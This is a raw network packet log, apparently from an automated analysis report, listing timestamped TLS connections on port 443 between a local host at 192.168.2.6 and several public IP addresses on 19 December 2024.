                                                                                              Dec 19, 2024 14:35:58.832788944 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.848407984 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.848448038 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.848454952 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.854773045 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.854835987 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.854841948 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.861749887 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.861797094 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.861804008 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.869043112 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.869087934 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.869093895 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.874490023 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.874712944 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.874749899 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:58.874764919 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.876828909 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.876873970 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:58.876880884 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.883096933 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.883135080 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:58.883141994 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.899525881 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.899573088 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:58.899580002 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.908267021 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.908296108 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.908313990 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:58.908320904 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.908360958 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:58.920588970 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.969609976 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.969666958 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.969701052 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.969710112 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.969932079 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.969974041 CET44349744104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:58.970015049 CET49744443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:58.995235920 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.045361996 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.109222889 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.109232903 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.109267950 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.109287024 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.109288931 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.109309912 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.109323025 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.109349012 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.109371901 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.150311947 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.150321007 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.150351048 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.150363922 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.150372028 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.150383949 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.150424004 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.278662920 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.278750896 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.278753996 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.278784990 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.278811932 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.278824091 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.307456970 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.307507038 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.307539940 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.307552099 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.307585955 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.307606936 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.319816113 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.319895029 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.319902897 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.319999933 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.320058107 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.320365906 CET49745443192.168.2.6151.101.130.137
                                                                                              Dec 19, 2024 14:35:59.320377111 CET44349745151.101.130.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.970050097 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.973714113 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.973731041 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.975203991 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.975569010 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.976035118 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.976156950 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.976394892 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.976402998 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.981055975 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.983736038 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.983752012 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.987247944 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:59.987477064 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.987740040 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.987740040 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:59.987816095 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.032588005 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.032589912 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.032596111 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.078473091 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.431807995 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.432468891 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.433511972 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.434128046 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.434149027 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.434328079 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.434631109 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.437200069 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.437813997 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.437891006 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.438455105 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.438466072 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.440799952 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.440871954 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.440876007 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.440880060 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.440888882 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.445413113 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.446463108 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.446470022 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.448553085 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.450488091 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.450499058 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.453862906 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.454538107 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.454569101 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.462129116 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.462208033 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.462215900 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.499053001 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.499061108 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.509397030 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.509502888 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.509900093 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.510282993 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.510318995 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.515896082 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.546139002 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.551609039 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.556514978 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.589395046 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.589484930 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:00.592226982 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:00.592253923 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.592977047 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.592992067 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.593025923 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.596366882 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:00.596487045 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:00.596502066 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.596678019 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:00.607989073 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.608012915 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.627624035 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.627702951 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.627712965 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.631166935 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.631228924 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.631237984 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.635560036 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.635628939 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.635648012 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.639367104 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.640036106 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.640088081 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.640094995 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.646670103 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.646718025 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.646725893 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.648124933 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.648169994 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.648176908 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654675961 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654716969 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.654716969 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654731989 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654767036 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.654783964 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654818058 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654835939 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.654848099 CET44349755104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.654860020 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.654860020 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.654886007 CET49755443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.656467915 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.656507969 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.656514883 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.659204006 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.659235954 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.659293890 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.659595966 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.659610987 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.673041105 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.673078060 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.673085928 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.681485891 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.681533098 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.681540012 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.689697981 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.689749002 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.689759016 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.698118925 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.698170900 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.698179007 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.704443932 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.704494953 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.704518080 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.710798025 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.710853100 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.710860014 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.717101097 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.717170000 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.717175961 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.723099947 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.723157883 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:00.723159075 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.723213911 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.723429918 CET49756443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:00.723438978 CET44349756104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.264027119 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.264307976 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.264383078 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:01.264883041 CET49753443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:36:01.264913082 CET4434975320.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.376291037 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.376388073 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.376466036 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:01.723627090 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.723956108 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.724009991 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.724737883 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.725054979 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.725179911 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.725228071 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.764863014 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.764888048 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.870592117 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.870889902 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.870899916 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.871222973 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.871541977 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.871608019 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:01.871750116 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:01.919334888 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.179977894 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.180480957 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.180519104 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.180542946 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.180596113 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.180643082 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.181674957 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.188214064 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.188294888 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.188312054 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.196547031 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.196599960 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.196614981 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.204829931 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.204884052 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.204900980 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.219454050 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:36:02.219528913 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.248492956 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.299506903 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.311599016 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.311681986 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.311841011 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.313128948 CET49764443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.313141108 CET44349764104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.316689968 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.316737890 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.316832066 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.317055941 CET49773443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.317065954 CET44349773104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.342550993 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.372277975 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.376008987 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.376069069 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.376090050 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.384257078 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.384315968 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.384330988 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.392127991 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.392177105 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.392190933 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.400171995 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.400235891 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.400249958 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.415965080 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.416037083 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.416049957 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.423840046 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.424000978 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.424019098 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.431752920 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.431803942 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.431818008 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.439775944 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.439841032 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.439857006 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.446296930 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.446397066 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.446412086 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.497181892 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.497196913 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.542892933 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.565032005 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.567178011 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.567253113 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.567291021 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.572105885 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.572175980 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.572191954 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.577142000 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.577363014 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.577377081 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.581556082 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.581617117 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.581630945 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.595252991 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.595276117 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.595335007 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.595351934 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.595403910 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.600157976 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.600229979 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.600244045 CET44349763104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:36:02.600415945 CET49763443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:36:02.604557991 CET44349763104.18.94.41192.168.2.6
